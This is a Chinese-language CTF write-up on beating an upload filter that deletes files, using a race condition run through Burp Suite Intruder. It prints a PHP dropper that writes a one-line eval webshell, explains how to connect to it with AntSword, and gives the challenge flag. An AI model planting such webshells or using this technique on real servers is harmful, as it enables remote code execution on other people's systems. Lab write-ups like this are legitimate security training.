打开题目链接，很常见的文件上传框

经过尝试，发现上传东西后会调用upload.php，猜测文件被传到upload目录下

随便传了几个类型的文件，访问upload目录

发现.php文件以及.htaccess、.user.ini这种配置文件都没有传上去

但是通过抓包我们可以发现，其实php文件以及配置文件都是上传成功了的（响应200）

说明文件上传成功，但是服务器在短时间内就立刻将其删掉了

这种情况只能采取条件竞争

条件竞争原理：当我们成功上传了php文件，服务端会在短时间内将其删除，我们需要抢在它删除之前访问文件并生成一句话木马文件，所以访问包的线程需要大于上传包的线程。

这里我们先写一个用于上传的php文件（我这里命名为m.php），内容如下：

<?php fputs(fopen("shell.php", "w"), '<?php @eval($_POST["shell"]); ?>'); ?>

我们可以使用多线程并发的访问上传的文件，总会有一次在上传文件到删除文件这个时间段内访问到上传的php文件（m.php），一旦我们成功访问到了上传的文件（m.php），那么它就会向服务器写一个shell（shell.php）。

换句话说，我们最终利用的并不是我们上传的文件，上传只是为了能有一刻成功访问，一旦访问成功，便会写入一句话木马，我们最终利用的就是新写入的php文件。

上传m.php，利用burpsuite抓包（这个是上传包）

设置上传包的线程数（这里设置为30）

设置攻击载荷，选择没有负载，并且勾上无限期地重复

这里注意一个小细节：

如果没有清除有效负载的位置

开始攻击后的请求包中filename为空

清除之后，再开始攻击

filename=m.php（即我们上传的文件）

接下来我们抓访问包：

我们直接尝试访问shell.php，使用burpsuite进行抓包

同理设置线程数（这里设置为80）

注意：访问包的线程数一定要大于上传包的线程数

设置攻击载荷，选择没有负载，并且勾上无限期地重复

设置好之后开始攻击

最开始可能访问包都是404或者500

但是过一会儿你再次筛选状态码，你就会看到200的响应

这说明条件竞争成功，已经成功向服务器写入了shell.php

我们访问upload目录查看，确实已经存在shell.php

接下来使用蚁剑连接即可

在html目录下找到flag.php

cyberpeace{b2ccdb64cfd4c8f30450d306dab8da1c}